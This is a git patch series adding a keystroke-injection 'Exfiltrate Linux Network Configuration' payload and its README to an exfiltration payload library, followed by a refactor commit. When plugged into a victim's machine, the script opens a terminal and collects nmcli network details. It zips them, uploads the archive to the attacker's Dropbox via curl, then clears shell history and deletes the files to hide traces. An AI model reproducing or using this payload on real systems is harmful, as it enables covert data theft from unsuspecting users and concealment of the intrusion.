From bf5c48ec2bc6239c9e0d4fbc0f4fbae7e61e321f Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 11:58:29 +0200 Subject: [PATCH 1/3] Exfiltrate Linux Network Configuration --- .../payload.txt | 95 +++++++++++++++++++ 1 file changed, 95 insertions(+) create mode 100644 payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt new file mode 100644 index 0000000..b7a7914 --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt @@ -0,0 +1,95 @@ +REM ########################################################## +REM # | +REM # Title : Exfiltrate Linux Network Configuration | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Linux | +REM # | +REM ########################################################## + +REM Requirements: +REM - Internet Connection +REM - Dropbox Account +REM - - DROPBOX_ACCESS_TOKEN + +DELAY 1000 +CTRL-ALT t + +DELAY 2000 +REM Required: Set here your Dropbox access TOKEN +DEFINE TOKEN example +STRING ACCESS_TOKEN=" +STRING TOKEN +STRING " +ENTER + +REM DELAY 500 +REM STRING USER_NAME=$(whoami) +REM ENTER + +DELAY 500 +STRING RANDOM=$(shuf -i 1-999999999999 -n 1) +ENTER + +DELAY 500 +STRING ZIP_NAME="$RANDOM.zip" +ENTER +DELAY 500 +STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" +ENTER + +REM Folder path +DELAY 500 +STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) +ENTER + +DELAY 500 +STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt" +ENTER + +DELAY 1000 +STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" +ENTER + +DELAY 1000 +STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" +ENTER + +DELAY 1000 +REM Delay for zipping operation, it depends by computer power and folder directory +STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" +DELAY 3000 + + +REM Set yout Dropbox folder name +DEFINE DROPBOX_FOLDER_NAME example +STRING DROPBOX_FOLDER="/ +ENTER +STRING DROPBOX_FOLDER_NAME +ENTER +STRING " +ENTER +DELAY 500 + +DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload +STRING curl -X POST +STRING DROPBOX_API_CONST +STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" +ENTER + +DELAY 2000 +STRING history -c +ENTER + +DELAY 500 +STRING rm -rf "$TMP_FOLDER_PATH" +ENTER + +DELAY 500 +STRING rm -rf "$ZIP_PATH" +ENTER + +DELAY 500 +STRING exit +ENTER From d62f16f914a7aef64f8abfd49bb4e196e7aa1590 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 11:59:33 +0200 Subject: [PATCH 2/3] Create README.md --- .../README.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md new file mode 100644 index 0000000..db8dadb --- /dev/null +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md @@ -0,0 +1,27 @@ + +# Exfiltrate Network Configuration - Linux ✅ + +A script used to exfiltrate the network configuration on a Linux machine. + +**Category**: Exfiltrate, Execution + +## Description + +A script used to exfiltrate the network configuration on a Linux machine. + +Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces. + +## Getting Started + +### Dependencies + +* Internet Connection +* Dropbox Token + +### Executing program + +* Plug in your device + +### Settings + +* Set the Dropbox token \ No newline at end of file From 1c7176bb4d846ba79bd91e6e3f29302365d83040 Mon Sep 17 00:00:00 2001 From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com> Date: Mon, 12 Jun 2023 14:43:21 -0400 Subject: [PATCH 3/3] Update payload.txt --- .../payload.txt | 81 +++++-------------- 1 file changed, 22 insertions(+), 59 deletions(-) diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt index b7a7914..d0ff809 100644 --- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt +++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt @@ -13,83 +13,46 @@ REM - Internet Connection REM - Dropbox Account REM - - DROPBOX_ACCESS_TOKEN -DELAY 1000 -CTRL-ALT t +DEFINE #TOKEN example +DEFINE #DROPBOX_FOLDER_NAME example +DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload + + +DEFAULT_DELAY 500 +CTRL ALT t DELAY 2000 REM Required: Set here your Dropbox access TOKEN -DEFINE TOKEN example -STRING ACCESS_TOKEN=" -STRING TOKEN -STRING " -ENTER +STRINGLN ACCESS_TOKEN="#TOKEN" -REM DELAY 500 REM STRING USER_NAME=$(whoami) REM ENTER -DELAY 500 -STRING RANDOM=$(shuf -i 1-999999999999 -n 1) -ENTER +STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1) -DELAY 500 -STRING ZIP_NAME="$RANDOM.zip" -ENTER -DELAY 500 -STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" -ENTER +STRINGLN ZIP_NAME="$RANDOM.zip" +STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME" REM Folder path -DELAY 500 -STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) -ENTER +STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX) -DELAY 500 -STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt" -ENTER +STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt" -DELAY 1000 -STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" -ENTER +STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt" -DELAY 1000 -STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" -ENTER +STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt" -DELAY 1000 REM Delay for zipping operation, it depends by computer power and folder directory -STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" +STRINGLN zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH" DELAY 3000 - REM Set yout Dropbox folder name -DEFINE DROPBOX_FOLDER_NAME example -STRING DROPBOX_FOLDER="/ -ENTER -STRING DROPBOX_FOLDER_NAME -ENTER -STRING " -ENTER -DELAY 500 +STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME" -DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload -STRING curl -X POST -STRING DROPBOX_API_CONST -STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" -ENTER +STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH" DELAY 2000 -STRING history -c -ENTER - -DELAY 500 -STRING rm -rf "$TMP_FOLDER_PATH" -ENTER - -DELAY 500 -STRING rm -rf "$ZIP_PATH" -ENTER - -DELAY 500 -STRING exit -ENTER +STRINGLN history -c +STRINGLN rm -rf "$TMP_FOLDER_PATH" +STRINGLN rm -rf "$ZIP_PATH" +STRINGLN exit